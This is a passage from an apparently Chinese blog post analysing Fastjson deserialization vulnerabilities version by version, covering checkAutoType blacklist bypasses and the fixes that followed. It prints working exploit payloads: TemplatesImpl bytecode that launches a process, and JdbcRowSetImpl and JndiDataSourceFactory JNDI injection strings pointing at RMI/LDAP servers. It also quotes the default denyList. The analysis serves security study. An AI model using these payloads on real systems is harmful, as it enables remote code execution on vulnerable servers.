data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210909111553342.png" alt="image-20210909111553342"></p><p>可以看到通过反射赋值时是支持给私有属性赋值的。</p><p>关于无参构造函数和有参构造函数的调用逻辑在<code>/com/alibaba/fastjson/util/JavaBeanInfo.class</code>121行 获取默认构造函数也就是无参构造函数,131 判断获取到的无参构造函数是否存在,不存在则去获取构造的构造函数,也就是有参构造函数(默认会去找参数最多的那一个构造函数),所以说当无参构造函数存在时直接就可以给所有属性赋值,包括私有属性。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210910101303461.png" alt="image-20210910101303461"></p><p>再说回<code>_tfactory</code> 属性虽然是私有属性,也没有 setter 方法。但是 TemplatesImpl 有无参构造函数,我们直接在 json 字符串里声明 <code>_tfactory</code> 他就会给他赋值。所以最终的 payload</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADMAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAcDAAdAB4BAD0vU3lzdGVtL0FwcGxpY2F0aW9ucy9DYWxjdWxhdG9yLmFwcC9Db250ZW50cy9NYWNPUy9DYWxjdWxhdG9yDAAfACABABxieXRlY29kZXMvSGVsbG9UZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvaW8vSU9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAANAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAEAALAAAABAABAAwAAQAOAA8AAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAATAAQAFAANABUACwAAAAQAAQAQAAEAEQAAAAIAEg=="],"_name":"11111","_tfactory":{},"_outputProperties":{}}</span><br></pre></td></tr></table></figure><p>这里直接给TransformerFactoryImpl类型的 _tfactory 赋了一个空值,反序列化的时候会自动 new 一个 TransformerFactoryImpl 对象给其赋值。最后记得申明一个 <code>_outputProperties</code>属性,因为调用的入口是<code>getOutputProperties</code> </p><p>至于为啥 <code>_outputProperties</code>属性 对应的 setter 方法是 <code>getOutputProperties</code> ,fastjson 在获取setter方法的时候会忽略 属性名前的 <code>_</code>,而且当setter 方法的第4位不是大写时,以<code>f</code>开头也是可以的</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210910103132648.png" alt="image-20210910103132648"></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210910153004347.png" alt="image-20210910153004347"></p><p>这个 payload 只有在开启了<code>Feature.SupportNonPublicField</code>的时候才能调用成功,有一点鸡肋。而这个 <code>Feature.SupportNonPublicField</code> 在 Fastjson 1.2.22 引入,所以小于 1.2.22 这个 payload 也用不了 </p><h3 id="JdbcRowSetImpl"><a href="#JdbcRowSetImpl" class="headerlink" title="JdbcRowSetImpl"></a>JdbcRowSetImpl</h3><p> JdbcRowSetImpl 利用链原理就是 jndi 注入,可以通过 RMI+JNDI 或者 RMI+LDAP 进行利用</p><p>触发的地方在 setAutoCommit,AutoCommit参数的 setter 方法</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210910165033708.png" alt="image-20210910165033708"></p><p>在 1291 行去调用了 this.connect(),去连接我们构造的恶意 jndi 服务端,其中 URL 参数为 dataSourceName ,存在 setter 方法,所以能够直接赋值。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210910165253257.png" alt="image-20210910165253257"></p><p>构造 Payload<br>{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”rmi://127.0.0.1:1099/badClassName”, “autoCommit”:true}</p><p>构造恶意的 rmi 服务端</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210910171554438.png" alt="image-20210910171554438"></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210910171424707.png" alt="image-20210910171424707"></p><p>虽然使用 JdbcRowSetImpl 利用链去构造 payload 不用开启 Feature.SupportNonPublicField ,但是对 jdk 版本要求比较严格。</p><p>Oracle JDK 6u45、7u21 之后:</p><p>java.rmi.server.useCodebaseOnly 的默认值被设置为 true</p><p>禁用自动加载远程类文件,仅从 CLASSPATH 和当前 JVM 的 java.rmi.server.codebase 指定路径加载</p><p>RMI + JNDI References</p><p>Oracle JDK 6u141、7u131、8u121之后:</p><p>增加了com.sun.jndi.rmi.object.trustURLCodebase、com.sun.jndi.cosnaming.object.trustURLCodebase 选项,默认值为 false</p><p>不允许 RMI 和 CORBA 从远程的 Codebase 加载 Reference 工厂类</p><p>LDAP + JNDI References</p><p>Oracle JDK 11.0.1、8u191、7u201、6u211之后:</p><p>设置 com.sun.jndi.ldap.object.trustURLCodebase 默认为 false</p><p>禁止 LDAP 协议使用远程 codebase</p><p>绕过 jdk 版本限制进行 jndi 注入</p><p><a href="http://j0k3r.top/2020/08/11/java-jndi-inject/#%E5%AE%9E%E6%88%98%E6%A1%88%E4%BE%8B">http://j0k3r.top/2020/08/11/java-jndi-inject/#%E5%AE%9E%E6%88%98%E6%A1%88%E4%BE%8B</a></p><h1 id="Fastjson-1-2-25-1-2-41"><a href="#Fastjson-1-2-25-1-2-41" class="headerlink" title="Fastjson 1.2.25-1.2.41"></a>Fastjson 1.2.25-1.2.41</h1><p>Fastjson 1.2.25 引入了 checkAutoType 安全机制,默认关闭的情况下不能反序列化类,开启后对反序列化类进行黑名单检测。同时也提供了添加和删除黑名单类的接口,用户也可以自己添加不可反序列化的类。</p><p>checkAutoType 安全机制实现的逻辑主要在 <code>com.alibaba.fastjson.parser.ParserConfig</code></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913102728936.png" alt="image-20210913102728936"></p><p>默认的黑名单为 denyList </p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">bsh,com.mchange,com.sun.</span><br><span class="line">java.lang.Thread</span><br><span class="line">java.net.Socket</span><br><span class="line">java.rmi</span><br><span class="line">javax.xml</span><br><span class="line">org.apache.bcel</span><br><span class="line">org.apache.commons.beanutils</span><br><span class="line">org.apache.commons.collections.Transformer</span><br><span class="line">org.apache.commons.collections.functors</span><br><span class="line">org.apache.commons.collections4.comparators</span><br><span class="line">org.apache.commons.fileupload</span><br><span class="line">org.apache.myfaces.context.servlet</span><br><span class="line">org.apache.tomcat</span><br><span class="line">org.apache.wicket.util</span><br><span class="line">org.codehaus.groovy.runtime</span><br><span class="line">org.hibernate,org.jboss</span><br><span class="line">org.mozilla.javascript</span><br><span class="line">org.python.core,org.springframework</span><br></pre></td></tr></table></figure><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913102238753.png" alt="image-20210913102238753"></p><p>先检测白名单后黑名单,白名单默认是空的,检测方式其实就是判断是否以名单中的字符串开始。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913103003768.png" alt="image-20210913103003768"></p><p>黑名单里把 java.rmi 和 org.apache.commons.collections.Transformer 还有一些常见的反序列化链用到的类都给 ban 了,所以之前的 payload 也用不了了。</p><p>未开启 AutoType 或者命中了黑名单会爆 autoType is not support. </p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913105248964.png" alt="image-20210913105248964"></p><p>在黑名单检测之后 <code>clazz = TypeUtils.loadClass(typeName, this.defaultClassLoader);</code> 去加载类,在<code>TypeUtils.loadClass</code>里为了兼容带有描述符的类名,会把类名头部的<code>[</code>去了还有以<code>L </code>起头<code>;</code>结尾时也会把<code>L</code>和 <code>; </code>去了。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913104926804.png" alt="image-20210913104926804"></p><p>所以这里有个逻辑漏洞,我们给类名的头尾加上 <code>L </code> <code>[</code> <code>;</code>可以绕过黑名单检测,接着在加载类的时候又会把这些字符给去了。</p><p>前提是开启了 AutoType。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913110324366.png" alt="image-20210913110324366"></p><h1 id="Fastjson-1-2-25-1-2-42"><a href="#Fastjson-1-2-25-1-2-42" class="headerlink" title="Fastjson 1.2.25-1.2.42"></a>Fastjson 1.2.25-1.2.42</h1><p>Fastjson 1.2.42 版本对 Fastjson 1.2.25 逻辑漏洞绕过黑名单的问题进行了修复,并且黑名单采用了哈希加密混淆。这么久</p><p>主要修改的部分还是在 <code>com.alibaba.fastjson.parser.ParserConfig</code></p><p>黑名单:</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913135101698.png" alt="image-20210913135101698"></p><p>有师傅去碰撞过这些 hash,找到了其中一些 hash 对应的类。 </p><p> <a href="https://github.com/LeadroyaL/fastjson-blacklist">https://github.com/LeadroyaL/fastjson-blacklist</a></p><p>接着看黑名单检测的逻辑,在检测之前对类名处理了一下,其中一些参数也使用了 hash 进行混淆。但是应该就是处理 <code>L</code> <code>[</code> <code>;</code> 这些字符,去除头尾的 <code>L</code> <code>[</code> <code>;</code> </p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913135558350.png" alt="image-20210913135558350"></p><p>这里只会处理一次,而在 loadclass 里是递归的去处理的,所以双写就能绕过(<del>这修复认真的嘛</del>)</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913140522595.png" alt="image-20210913140522595"></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913141035305.png" alt="image-20210913141035305"></p><h1 id="Fastjson-1-2-25-1-2-43"><a href="#Fastjson-1-2-25-1-2-43" class="headerlink" title="Fastjson 1.2.25-1.2.43"></a>Fastjson 1.2.25-1.2.43</h1><p>修改了 <code>com.alibaba.fastjson.parser.ParserConfig</code> 处理 <code>L</code> <code>[</code> <code>;</code> 的逻辑,检测类名头部如果以 <code>L</code> <code>L</code>开头,如果是则直接抛出异常。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913145956033.png" alt="image-20210913145956033"></p><p>这里说一些为什么在加载类的时候要去忽略 <code>L</code> <code>[</code> <code>;</code> 这些字符其实是 JNI 字段描述符,类似于 php 序列化里的 O表示对象、s 表示字符串。</p><p>图来自 <a href="https://www.playpi.org/2019041301.html">https://www.playpi.org/2019041301.html</a></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913160943935.png" alt="image-20210913160943935"> </p><p>而 <code>[ </code>则是用来表示数组的,”[I” 就表示int[],<code>[L</code>表示对象数组</p><p>既然只会检测<code>LL</code>我们还可以用 <code>[</code>绕过,因为<code>[</code> 表示数组,所以类名里有他的话,会进行特殊处理。payload就需要重新构造一下。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">{"@type":"[com.sun.rowset.JdbcRowSetImpl"[,{"dataSourceName":"rmi://127.0.0.1:1099/Exploit","autoCommit":true}</span><br></pre></td></tr></table></figure><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913153900351.png" alt="image-20210913153900351"></p><h1 id="Fastjson-1-2-25-1-2-45"><a href="#Fastjson-1-2-25-1-2-45" class="headerlink" title="Fastjson 1.2.25-1.2.45"></a>Fastjson 1.2.25-1.2.45</h1><p>在 Fastjson 1.2.44 里对 1.2.43 进行了修复直接判断类名以 <code>[</code>开头直接抛出异常,以<code>;</code>结尾抛出异常。因为在 <code>loadclass </code>只有 <code>L</code> 开头同时<code>;</code>结尾时才会忽略。这样就没办法通过以前的办法绕过了。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210913155515183.png" alt="image-20210913155515183"></p><p>1.2.45 版本被爆出了一个利用黑名单之外的类可以用来 RCE ,利用的是 mybatis 库的<code>org.apache.ibatis.datasource.jndi.JndiDataSourceFactory</code>类。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">{</span><br><span class="line"> "@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",</span><br><span class="line"> "properties":{</span><br><span class="line"> "data_source":"ldap://127.0.0.1:23457/Command8"</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1 id="Fastjson-lt-1-2-47"><a href="#Fastjson-lt-1-2-47" class="headerlink" title="Fastjson <=1.2.47"></a>Fastjson <=1.2.47</h1><p>这个漏洞是 fastjson 漏洞史上最严重的一个,可以在唯一一个在未开启 autotype 的情况下可以利用的 payload</p><p>payload </p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Exploit","autoCommit":true}]</span><br></pre></td></tr></table></figure><p>payload 是数组形式,其中 <code>{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Exploit","autoCommit":true}</code> 就是之前正常的 jndi 注入的 paylaod 。</p><p>还是先来看 <code>com.alibaba.fastjson.parser.ParserConfig </code> checkAutoType 部分</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916141906289.png" alt="image-20210916141906289"></p><p>这里有好几个 if 用来获取类,第一个就是 autoType 开启的情况下去黑白名单检测成功之后直接返回用户指定的类,失败的话就直接抛出异常不继续往下走。</p><p>所以这里必须在 autoType 未开启的情况下,会通过 clazz = TypeUtils.getClassFromMapping(typeName); 去获取类,这里的 typeName 就是 @type 里指定的类。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916142110151.png" alt="image-20210916142110151"></p><p>getClassFromMapping 方法其实就是从 Mappings 字典里去获取</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916142646702.png" alt="image-20210916142646702"></p><p>打个断点看看 Mappings 里有啥,Mappings 中存储着类名字符串以及对应类对象,它起到一个缓存作用。如果 <code>@type</code> 指定的类,在缓存 Mappings 字典里找到的话,跳过 checkAutoType 检测直接返回类对象。这里就是这个漏洞的关键,只要在 Mappings 里添加进我们需要反序列化的类,就能绕过 checkAutoType 的黑名单检测。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916142834956.png" alt="image-20210916142834956"></p><p>我们看 payload 的第一部分,@type 为 java.lang.Class,其并不在 Mappings 里。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"}</span><br></pre></td></tr></table></figure><p>如果不在 Mappings 里的类就继续往下,通过 clazz = this.deserializers.findClass(typeName); 去获取。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916144104777.png" alt="image-20210916144104777"></p><p>看 findClass 方法,这里有会在 buckets 数组里寻找,如果<code>@type</code> 在 buckets 存在的话就返回类</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916144209162.png" alt="image-20210916144209162"></p><p>一样的打个断点看一下 buckets 数组的内容,里边存了一些基础的类。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916144433722.png" alt="image-20210916144433722"></p><p>java.lang.Class 也在其中,所以这里命中之后 checkAutoType 方法返回类。回到 <code>/com/alibaba/fastjson/parser/DefaultJSONParser.class</code></p><p>返回的类赋值给 clazz ,接着就是对 clazz 做各种处理。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916144916552.png" alt="image-20210916144916552"></p><p>这里一直到 365 行开始反序列化</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916145107551.png" alt="image-20210916145107551"></p><p>跟进deserializer.deserialze() 方法</p><p> com/alibaba/fastjson/serializer/MiscCodec.class</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916145414035.png" alt="image-20210916145414035"></p><p>这里 lexer.token() 为 16,直接看这部分,这里处理 json 中的 val 字段(com.sun.rowset.JdbcRowSetImpl)并赋值给 objVal </p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916150255815.png" alt="image-20210916150255815"></p><p>接着在 266行的位置,又把 objVal 赋值给 strVal 。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916150405285.png" alt="image-20210916150405285"></p><p> 在 303 行的位置判断 clazz == Class.class ,这里的 clazz 就是前边传入的 clazz,也就是 <code>java.lang.Class</code>,所以这里自然符合条件,通过 TypeUtils.loadClass 去加载 strVal 也就是 com.sun.rowset.JdbcRowSetImpl。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916150727242.png" alt="image-20210916150727242"></p><p>继续跟进 loadClass ,可以看到在加载的时候先判断类是否在 mappings 中,如果不存在,加载完成之后会添加进 mappings。</p><p>com/alibaba/fastjson/util/TypeUtils.class</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916151202620.png" alt="image-20210916151202620"></p><p>所以这里我们就把我们需要用到的恶意类 com.sun.rowset.JdbcRowSetImpl 添加进了 mappings,等下次反序列化进入 checkAutoType 时就可以绕过黑白名单检测。这就是 payload 第一部分 <code>{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"}</code>的作用。</p><p>第二部分的反序列化就和之前的一样了。</p><h1 id="fastjson-lt-1-2-68"><a href="#fastjson-lt-1-2-68" class="headerlink" title="fastjson <=1.2.68"></a>fastjson <=1.2.68</h1><p>fastjson 1.2.68 更新了一个新的安全机制 safeMode,在开启的情况下 checkAutoType 方法会直接抛出异常。连绕过的机会都不给了,而且在陆陆续续的版本更迭 checkAutoType 方法的代码也更新了许多但是逻辑基本没变。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916153816933.png" alt="image-20210916153816933"></p><p>但是被爆出在开启 AutoType 和 不开启 safeMode 的情况下可以通过 expectClass 绕过 AutoType</p><p>payload</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">{"@type":"java.lang.AutoCloseable", "@type":"Evil","name":"/System/Applications/Calculator.app/Contents/MacOS/Calculator"}</span><br></pre></td></tr></table></figure><p>说一下漏洞比较关键的地方</p><p>在解析第二个 @type 时会调用 <code>userType = config.checkAutoType(ref, expectClass, lexer.getFeatures());</code></p><p>此时 ref 为 Evil 也就是我们构造等恶意类,expectClass 为 java.lang.AutoCloseable,expectClass 称之为期望类。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916172342391.png" alt="image-20210916172342391"></p><p>可以看到在不开启AutoType 的情况下 只要 expectClassFlag 为true 进行 loadClass。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916170918989.png" alt="image-20210916170918989"></p><p>而 expectClassFlag 取决于 expectClass 此时 expectClass 为 java.lang.AutoCloseable</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916170717185.png" alt="image-20210916170717185"></p><p>这里满足条件赋值 expectClassFlag = true;</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916172903017.png" alt="image-20210916172903017"></p><p>接着在 1189行这里去加载类 typeName 也就是我们构造的 Evil。</p><p><img src="" 